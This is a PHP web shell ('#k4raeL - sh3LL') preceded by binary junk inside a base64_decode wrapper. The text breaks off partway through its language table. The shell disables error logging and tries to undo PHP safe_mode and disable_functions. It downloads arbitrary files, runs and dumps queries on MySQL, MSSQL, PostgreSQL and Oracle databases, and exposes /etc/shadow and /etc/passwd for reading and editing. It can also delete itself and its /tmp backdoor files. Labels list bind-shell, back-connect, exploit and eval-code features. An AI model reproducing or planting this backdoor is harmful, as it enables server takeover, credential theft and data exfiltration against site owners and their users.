0*t @O1 ydS @ ++?0A" </U!0-Bo.h X`*'@ 1KhxGqz8HGsqw|DALD8z}.~?/"(@^Kd ?[^_?;A4yy<zyzG=xW<|<ywr˓~g}W=zwg;Շ'>+=6=4 ; ".base64_decode("<?php

#*********************************************
#          #attack3rz
#        Altred by Ac Team ak
#        http://www.h4ckz.net
#*********************************************

error_reporting(0);

$language='eng';

$auth = 0;

$name='eea73055a0cd895bf7400a0ac0a7be0b';
$pass='eea73055a0cd895bf7400a0ac0a7be0b';

@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");

@ini_set('error_log',NULL);
@ini_set('log_errors',0);

if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};

define("starttime",@getmicrotime());
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
$version = '1.00';
if(@version_compare(@phpversion(), '4.1.0') == -1)
 {
 $_POST   = &$HTTP_POST_VARS;
 $_GET    = &$HTTP_GET_VARS;
 $_SERVER = &$HTTP_SERVER_VARS;
 $_COOKIE = &$HTTP_COOKIE_VARS;
 }
if (@get_magic_quotes_gpc())
 {
 foreach ($_POST as $k=>$v)
  {
  $_POST[$k] = stripslashes($v);
  }
 foreach ($_COOKIE as $k=>$v)
  {
  $_COOKIE[$k] = stripslashes($v);
  }
 }

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
   {
   header('WWW-Authenticate: Basic realm="HELLO!"');
   header('HTTP/1.0 401 Unauthorized');
   exit("<b>Access Denied. You need to contact v4 Team for password!</b>");
   }
}
$head = '
<html>
<head>
<title>#k4raeL - sh3LL </title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<script type="text/javascript" language="javascript">
<!--
ML="C:cj/Sizm<rPs.R=>pIohT tel";
MI="950>B;EF5>0?DGGA144<DHIIH:7=2C84267=3<@9450>B;E@";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>

<STYLE>
tr {
BORDER-RIGHT:  #aaaaaa 1px solid;
BORDER-TOP:    #eeeeee 1px solid;
BORDER-LEFT:   #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
color: #FFFFFF;
}
td {
BORDER-RIGHT:  #aaaaaa 1px solid;
BORDER-TOP:    #eeeeee 1px solid;
BORDER-LEFT:   #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
color: #FFFFFF;
}
.table1 {
BORDER: 0px;
BACKGROUND-COLOR: #181818;
color: #FFFFFF;
}
.td1 {
BORDER: 0px;
font: 7pt Verdana;
color: #FFFFFF;
}
.tr1 {
BORDER: 0px;
color: #FFFFFF;
}
table {
BORDER:  #eeeeee 1px outset;
BACKGROUND-COLOR: #181818;
color: #FFFFFF;
}
input {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #000000;
font: 8pt Verdana;
color: #FFFFFF;
}
select {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #000000;
font: 8pt Verdana;
color: #FFFFFF;;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: #000000;
width: 30%;
color: #FFFFFF;
}
textarea {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #000000;
font: Fixedsys bold;
color: #FFFFFF;
}
BODY {
margin: 1px;
color: #FFFFFF;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:067AFC;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}


</script>';
class zipfile
{
    var $datasec      = array();
    var $ctrl_dir     = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year']    = 1980;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
    function addFile($data, $name, $time = 0)
    {
        $name     = str_replace('\\', '/', $name);
        $dtime    = dechex($this->unix2DosTime($time));
        $hexdtime = '\x' . $dtime[6] . $dtime[7]
                  . '\x' . $dtime[4] . $dtime[5]
                  . '\x' . $dtime[2] . $dtime[3]
                  . '\x' . $dtime[0] . $dtime[1];
        eval('$hexdtime = "' . $hexdtime . '";');
        $fr   = "\x50\x4b\x03\x04";
        $fr   .= "\x14\x00";
        $fr   .= "\x00\x00";
        $fr   .= "\x08\x00";
        $fr   .= $hexdtime;
        $unc_len = strlen($data);
        $crc     = crc32($data);
        $zdata   = gzcompress($data);
        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len   = strlen($zdata);
        $fr      .= pack('V', $crc);
        $fr      .= pack('V', $c_len);
        $fr      .= pack('V', $unc_len);
        $fr      .= pack('v', strlen($name));
        $fr      .= pack('v', 0);
        $fr      .= $name;
        $fr .= $zdata;
        $this -> datasec[] = $fr;
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x14\x00";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x08\x00";
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name) );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('V', 32 );
        $cdrec .= pack('V', $this -> old_offset );
        $this -> old_offset += strlen($fr);
        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }
    function file()
    {
        $data    = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);
        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('v', sizeof($this -> ctrl_dir)) .
            pack('V', strlen($ctrldir)) .
            pack('V', strlen($data)) .
            "\x00\x00";
    }
}

function compress(&$filename,&$filedump,$compress)
 {
    global $content_encoding;
    global $mime_type;
    if ($compress == 'bzip' && @function_exists('bzcompress'))
     {
        $filename  .= '.bz2';
        $mime_type = 'application/x-bzip2';
        $filedump = bzcompress($filedump);
     }
     else if ($compress == 'gzip' && @function_exists('gzencode'))
     {
        $filename  .= '.gz';
        $content_encoding = 'x-gzip';
        $mime_type = 'application/x-gzip';
        $filedump = gzencode($filedump);
     }
     else if ($compress == 'zip' && @function_exists('gzcompress'))
     {
     $filename .= '.zip';
        $mime_type = 'application/zip';
        $zipfile = new zipfile();
        $zipfile -> addFile($filedump, substr($filename, 0, -4));
        $filedump = $zipfile -> file();
     }
     else
     {
     $mime_type = 'application/octet-stream';
     }
 }

function moreread($temp){
global $lang,$language;
$str='';
  if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){
   $ffile = @fopen($temp, "r");
   while(!@feof($ffile)){$str .= @fgets($ffile);}
   fclose($ffile);
  }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){
   $ffile = @fopen($temp, "r");
   $str = @fread($ffile, @filesize($temp));
   @fclose($ffile);
  }elseif(@function_exists('file')){
   $ffiles = @file ($temp);
   foreach ($ffiles as $ffile) { $str .= $ffile; }
  }elseif(@function_exists('file_get_contents')){
   $str = @file_get_contents($temp);
  }elseif(@function_exists('readfile')){
   $str = @readfile($temp);
  }else{echo $lang[$language.'_text56'];}
return $str;
}

function readzlib($filename,$temp=''){
global $lang,$language;
$str='';
  if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
  if(@copy("compress.zlib://".$filename, $temp)) {
   $str = moreread($temp);
  } else echo $lang[$language.'_text119'];
  @unlink($temp);
return $str;
}

function mailattach($to,$from,$subj,$attach)
 {
 $headers  = "From: $from\r\n";
 $headers .= "MIME-Version: 1.0\r\n";
 $headers .= "Content-Type: ".$attach['type'];
 $headers .= "; name=\"".$attach['name']."\"\r\n";
 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
 if(mail($to,$subj,"",$headers)) { return 1; }
 return 0;
 }
class my_sql
 {
 var $host = 'localhost';
 var $port = '';
 var $user = '';
 var $pass = '';
 var $base = '';
 var $db   = '';
 var $connection;
 var $res;
 var $error;
 var $rows;
 var $columns;
 var $num_rows;
 var $num_fields;
 var $dump;

 function connect()
  {
  switch($this->db)
     {
   case 'MySQL':
    if(empty($this->port)) { $this->port = '3306'; }
    if(!@function_exists('mysql_connect')) return 0;
    $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
    if(is_resource($this->connection)) return 1;
   break;
     case 'MSSQL':
      if(empty($this->port)) { $this->port = '1433'; }
    if(!@function_exists('mssql_connect')) return 0;
    $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
      if($this->connection) return 1;
     break;
     case 'PostgreSQL':
      if(empty($this->port)) { $this->port = '5432'; }
      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
      if(!@function_exists('pg_connect')) return 0;
      $this->connection = @pg_connect($str);
      if(is_resource($this->connection)) return 1;
     break;
     case 'Oracle':
      if(!@function_exists('ocilogon')) return 0;
      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
      if(is_resource($this->connection)) return 1;
     break;
     }
    return 0;
  }

 function select_db()
  {
   switch($this->db)
    {
  case 'MySQL':
   if(@mysql_select_db($this->base,$this->connection)) return 1;
    break;
    case 'MSSQL':
   if(@mssql_select_db($this->base,$this->connection)) return 1;
    break;
    case 'PostgreSQL':
     return 1;
    break;
    case 'Oracle':
     return 1;
    break;
    }
   return 0;
  }

 function query($query)
  {
   $this->res=$this->error='';
   switch($this->db)
    {
  case 'MySQL':
     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
      {
      $this->error = @mysql_error($this->connection);
      return 0;
      }
     else if(is_resource($this->res)) { return 1; }
     return 2;
  break;
    case 'MSSQL':
     if(false===($this->res=@mssql_query($query,$this->connection)))
      {
      $this->error = 'Query error';
      return 0;
      }
      else if(@mssql_num_rows($this->res) > 0) { return 1; }
     return 2;
    break;
    case 'PostgreSQL':
     if(false===($this->res=@pg_query($this->connection,$query)))
      {
      $this->error = @pg_last_error($this->connection);
      return 0;
      }
      else if(@pg_num_rows($this->res) > 0) { return 1; }
     return 2;
    break;
    case 'Oracle':
     if(false===($this->res=@ociparse($this->connection,$query)))
      {
      $this->error = 'Query parse error';
      }
     else
      {
      if(@ociexecute($this->res))
       {
       if(@ocirowcount($this->res) != 0) return 2;
       return 1;
       }
      $error = @ocierror();
      $this->error=$error['message'];
      }
    break;
    }
  return 0;
  }
 function get_result()
  {
   $this->rows=array();
   $this->columns=array();
   $this->num_rows=$this->num_fields=0;
   switch($this->db)
    {
  case 'MySQL':
   $this->num_rows=@mysql_num_rows($this->res);
   $this->num_fields=@mysql_num_fields($this->res);
   while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
   @mysql_free_result($this->res);
   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    case 'MSSQL':
   $this->num_rows=@mssql_num_rows($this->res);
   $this->num_fields=@mssql_num_fields($this->res);
   while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
   @mssql_free_result($this->res);
   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
    break;
    case 'PostgreSQL':
   $this->num_rows=@pg_num_rows($this->res);
   $this->num_fields=@pg_num_fields($this->res);
   while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
   @pg_free_result($this->res);
   if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    case 'Oracle':
     $this->num_fields=@ocinumcols($this->res);
     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
     @ocifreestatement($this->res);
     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
    break;
    }
   return 0;
  }
 function dump($table)
  {
   if(empty($table)) return 0;
   $this->dump=array();
   $this->dump[0] = '##';
   $this->dump[1] = '## --------------------------------------- ';
   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
   $this->dump[3] = '## Database: '.$this->base;
   $this->dump[4] = '##    Table: '.$table;
   $this->dump[5] = '## --------------------------------------- ';
   switch($this->db)
    {
  case 'MySQL':
   $this->dump[0] = '## MySQL dump';
   if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
   if(!$this->get_result()) return 0;
   $this->dump[] = $this->rows[0]['Create Table'];
     $this->dump[] = '## --------------------------------------- ';
   if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
   if(!$this->get_result()) return 0;
   for($i=0;$i<$this->num_rows;$i++)
    {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
    $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
    }
    break;
    case 'MSSQL':
     $this->dump[0] = '## MSSQL dump';
     if($this->query('SELECT * FROM '.$table)!=1) return 0;
   if(!$this->get_result()) return 0;
   for($i=0;$i<$this->num_rows;$i++)
    {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
    }
    break;
    case 'PostgreSQL':
     $this->dump[0] = '## PostgreSQL dump';
     if($this->query('SELECT * FROM '.$table)!=1) return 0;
   if(!$this->get_result()) return 0;
   for($i=0;$i<$this->num_rows;$i++)
    {
      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
    $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
    }
    break;
    case 'Oracle':
      $this->dump[0] = '## ORACLE dump';
      $this->dump[]  = '## under construction';
    break;
    default:
     return 0;
    break;
    }
   return 1;
  }
 function close()
  {
   switch($this->db)
    {
  case 'MySQL':
   @mysql_close($this->connection);
    break;
    case 'MSSQL':
     @mssql_close($this->connection);
    break;
    case 'PostgreSQL':
     @pg_close($this->connection);
    break;
    case 'Oracle':
     @oci_close($this->connection);
    break;
    }
  }
 function affected_rows()
  {
   switch($this->db)
    {
  case 'MySQL':
   return @mysql_affected_rows($this->res);
    break;
    case 'MSSQL':
     return @mssql_affected_rows($this->res);
    break;
    case 'PostgreSQL':
     return @pg_affected_rows($this->res);
    break;
    case 'Oracle':
     return @ocirowcount($this->res);
    break;
    default:
     return 0;
    break;
    }
  }
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
 {
  if($file=@fopen($_POST['d_name'],"r")){ $filedump = @fread($file,@filesize($_POST['d_name'])); @fclose($file); }
  else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
  if(isset($_POST['cmd']))
   {
    @ob_clean();
    $filename = @basename($_POST['d_name']);
    $content_encoding=$mime_type='';
    compress($filename,$filedump,$_POST['compress']);
    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
    header("Content-type: ".$mime_type);
    header("Content-disposition: attachment; filename=\"".$filename."\";");
    echo $filedump;
    exit();
   }
 }
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
 {
 echo $head;
 $sql = new my_sql();
 $sql->db   = $_POST['db'];
 $sql->host = $_POST['db_server'];
 $sql->port = $_POST['db_port'];
 $sql->user = $_POST['mysql_l'];
 $sql->pass = $_POST['mysql_p'];
 $sql->base = $_POST['mysql_db'];
 $querys = @explode(';',$_POST['db_query']);
 echo '<body bgcolor=#000000>';
 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
  else
   {
   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
   else
    {
    foreach($querys as $num=>$query)
     {
      if(strlen($query)>5)
      {
      echo "<font face=Verdana size=-2 color=2BD53F><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
      switch($sql->query($query))
       {
       case '0':
       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
       break;
       case '1':
       if($sql->get_result())
        {
       echo "<table width=100%>";
        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
       $keys = @implode("&nbsp;</b></font></td><td bgcolor=#0C0C0C><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
        echo "<tr><td bgcolor=#0C0C0C><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
        for($i=0;$i<$sql->num_rows;$i++)
         {
         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
         }
        echo "</table>";
        }
       break;
       case '2':
       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
       break;
       }
      }
     }
    }
   }
 echo "<br><form name=form method=POST>";
 echo in('hidden','db',0,$_POST['db']);
 echo in('hidden','db_server',0,$_POST['db_server']);
 echo in('hidden','db_port',0,$_POST['db_port']);
 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
 echo in('hidden','cmd',0,'db_query');
 echo "<div align=center>";
 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
 echo "</form>";
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }
if(isset($_GET['Delete']))
 {
   @unlink(__FILE__);
 }
if(isset($_GET['tmp']))
 {
   @unlink("/tmp/bdpl");
   @unlink("/tmp/back");
   @unlink("/tmp/bd");
   @unlink("/tmp/bd.c");
   @unlink("/tmp/dp");
   @unlink("/tmp/dpc");
   @unlink("/tmp/dpc.c");
   @unlink("/tmp/prxpl");
   @unlink("/tmp/grep.txt");
 }
if(isset($_GET['phpini']))
{
echo $head;
function U_value($value)
 {
 if ($value == '') return '<i>no value</i>';
 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
 if ($value === null) return 'NULL';
 if (@is_object($value)) $value = (array) $value;
 if (@is_array($value))
 {
 @ob_start();
 print_r($value);
 $value = @ob_get_contents();
 @ob_end_clean();
 }
 return U_wordwrap((string) $value);
 }
function U_wordwrap($str)
 {
 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
 }
if (@function_exists('ini_get_all'))
 {
 $r = '';
 echo '<table width=100%>', '<tr><td bgcolor=#0C0C0C><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#0C0C0C><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#0C0C0C><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
 foreach (@ini_get_all() as $key=>$value)
  {
  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
  }
 echo $r;
 echo '</table>';
 }
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['cpu']))
 {
   echo $head;
   echo '<table width=100%><tr><td bgcolor=#0C0C0C><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
   $cpuf = @file("cpuinfo");
   if($cpuf)
    {
      $c = @sizeof($cpuf);
      for($i=0;$i<$c;$i++)
        {
          $info = @explode(":",$cpuf[$i]);
          if($info[1]==""){ $info[1]="---"; }
          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
        }
      echo $r;
    }
   else
    {
      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
    }
   echo '</table>';
   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
   die();
 }
if(isset($_GET['mem']))
 {
   echo $head;
   echo '<table width=100%><tr><td bgcolor=#0C0C0C><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
   $memf = @file("meminfo");
   if($memf)
    {
      $c = sizeof($memf);
      for($i=0;$i<$c;$i++)
        {
          $info = explode(":",$memf[$i]);
          if($info[1]==""){ $info[1]="---"; }
          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
        }
      echo $r;
    }
   else
    {
      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
    }
   echo '</table>';
   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
   die();
 }

if(isset($_GET['dmesg(8)']))
 {$_POST['cmd'] = 'dmesg(8)';}
if(isset($_GET['free']))
 {$_POST['cmd'] = 'free';}
if(isset($_GET['accounts']))
 {$_POST['cmd'] = 'cat /var/cpanel/accounting.log';}
if(isset($_GET['vmstat']))
 {$_POST['cmd'] = 'vmstat';}
if(isset($_GET['lspci']))
 {$_POST['cmd'] = 'lspci';}
if(isset($_GET['lsdev']))
 {$_POST['cmd'] = 'lsdev';}
if(isset($_GET['procinfo']))
 {$_POST['cmd']='cat /proc/cpuinfo';}
if(isset($_GET['version']))
 {$_POST['cmd']='cat /proc/version';}
if(isset($_GET['interrupts']))
 {$_POST['cmd']='cat /proc/interrupts';}
if(isset($_GET['realise1']))
 {$_POST['cmd'] = 'cat /etc/*realise';}
if(isset($_GET['service']))
 {$_POST['cmd'] = 'service --status-all';}
if(isset($_GET['ifconfig']))
 {$_POST['cmd'] = 'ifconfig';}
if(isset($_GET['w']))
 {$_POST['cmd'] = 'w';}
if(isset($_GET['who']))
 {$_POST['cmd'] = 'who';}
if(isset($_GET['uptime']))
 {$_POST['cmd'] = 'uptime';}
if(isset($_GET['last']))
 {$_POST['cmd'] = 'last -n 10';}
if(isset($_GET['psaux']))
 {$_POST['cmd'] = 'ps -aux';}
if(isset($_GET['netstat']))
 {$_POST['cmd'] = 'netstat -a';}
if(isset($_GET['sbin']))
 {$_POST['cmd'] = 'ls -al /usr/sbin';}
if(isset($_GET['lsattr']))
 {$_POST['cmd'] = 'lsattr -va';}
if(isset($_GET['syslog']))
 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
if(isset($_GET['fstab']))
 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
if(isset($_GET['fdisk']))
 {$_POST['cmd'] = 'fdisk -l';}
if(isset($_GET['df']))
 {$_POST['cmd'] = 'df -h';}
if(isset($_GET['realise2']))
 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
if(isset($_GET['hosts']))
 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
if(isset($_GET['resolv']))
 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
if(isset($_GET['systeminfo']))
 {$_POST['cmd'] = 'systeminfo';}
if(isset($_GET['shadow']))
 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
if(isset($_GET['passwd']))
 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
#if(isset($_GET['']))
# {$_POST['cmd'] = '';}

$lang=array(
'eng_text1' =>'Last executed command',
'eng_text2' =>'Execute command on server',
'eng_text3' =>'Run command',
'eng_text4' =>'Work directory',
'eng_text5' =>'Upload files on server',
'eng_text6' =>'Local file',
'eng_text7' =>'Locate Important Files',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Execute',
'eng_butt2' =>'Upload',
'eng_text9' =>'bash port bind',
'eng_text10'=>'Port',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_text12'=>'back-connect',
'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_butt4' =>'Connect',
'eng_text15'=>'Upload files from remote server',
'eng_text16'=>'With',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text19'=>'Exploits',
'eng_text20'=>'Use',
'eng_text21'=>'&nbsp;New name',
'eng_text22'=>'datapipe',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Use',
'eng_butt5' =>'Run',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Change',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Show',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass safe_mode with load file in mysql',
'eng_text36'=>'Database . Table',
'eng_text37'=>'Login',
'eng_text38'=>'Password',
'eng_text39'=>'Database',
'eng_text40'=>'Dump database table',
'eng_butt9' =>'Dump',
'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_butt10'=>'Save',
'eng_text44'=>'Can\'t edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_butt11'=>'Edit file',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_butt12'=>'Find',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_butt13'=>'Create/Delete',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Create',
'eng_text66'=>'Delete',
'eng_text67'=>'Chown/Chgrp/Chmod',
'eng_text68'=>'Command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
